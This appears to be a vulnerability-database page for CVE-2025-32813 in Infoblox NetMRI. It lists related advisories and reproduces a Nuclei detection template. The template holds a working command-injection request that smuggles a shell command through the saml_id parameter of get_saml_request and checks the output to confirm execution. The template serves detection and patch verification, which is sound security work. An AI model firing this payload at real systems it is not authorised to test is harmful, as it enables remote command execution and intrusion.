Lucene search
K

Infoblox NetMRI < 7.6.1 - Unauthenticated Command Injection in get_saml_request

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Infoblox NetMRI versions < 7.6.1 have unauthenticated command injection vulnerability risk.

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the NetMRI network monitoring program, related to the failure to take measures for data cleaning at the management level, allows a perpetrator to execute arbitrary commands.
15 Jul 202500:00
bdu_fstec
Circl
CVE-2025-32813
22 May 202515:48
circl
CNNVD
Infoblox NETMRI 安全漏洞
22 May 202500:00
cnnvd
CVE
CVE-2025-32813
22 May 202500:00
cve
Cvelist
CVE-2025-32813
22 May 202500:00
cvelist
EUVD
EUVD-2025-16153
3 Oct 202520:07
euvd
NCSC
Vulnerabilities fixed in Infoblox NETMRI
23 May 202508:55
ncsc
NVD
CVE-2025-32813
22 May 202515:16
nvd
OSV
CVE-2025-32813
22 May 202515:16
osv
Positive Technologies
PT-2025-22490 · Infoblox · Infoblox Netmri
21 May 202500:00
ptsecurity
Rows per page
id: CVE-2025-32813

info:
  name: Infoblox NetMRI < 7.6.1 - Unauthenticated Command Injection in get_saml_request
  author: iamnoooob,pdresearch
  severity: high
  description: |
    An issue was discovered in Infoblox NETMRI before 7.6.1. Remote Unauthenticated Command Injection can occur.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands with elevated privileges through the saml_id parameter in the get_saml_request endpoint.
  remediation: |
    Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes user input in SAML request handling.
  reference:
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
    - https://github.com/RhinoSecurityLabs/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2025-32813
    cwe-id: CWE-77
    epss-score: 0.43042
    epss-percentile: 0.9856
    cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: infoblox
    product: netmri
    fofa-query: "Infoblox NetMRI"
  tags: cve,cve2025,infoblox,netmri,rce,vkev,vuln

http:
  - raw:
      - |
        GET /webui/application/get_saml_request?saml_id=1%26$(id|%20base64); HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: idcmd
        part: body
        group: 1
        regex:
          - "sh: (.*?): command"
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "sh", ": command not found","message")'
          - 'contains(content_type,"application/json")'
          - 'contains_all(base64_decode(idcmd),"uid=","gid=")'
          - 'status_code==500'
        condition: and
# digest: 4b0a00483046022100f6837b38203c30adf35555d6e2c8e8b7c2c58e1ecfdb3d04bfc567cc4b426b17022100e415402bf3879a526e47fd2366a24e3f6899122834826e8468b92eb82d6c568b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.2
EPSS0.43042
SSVC
20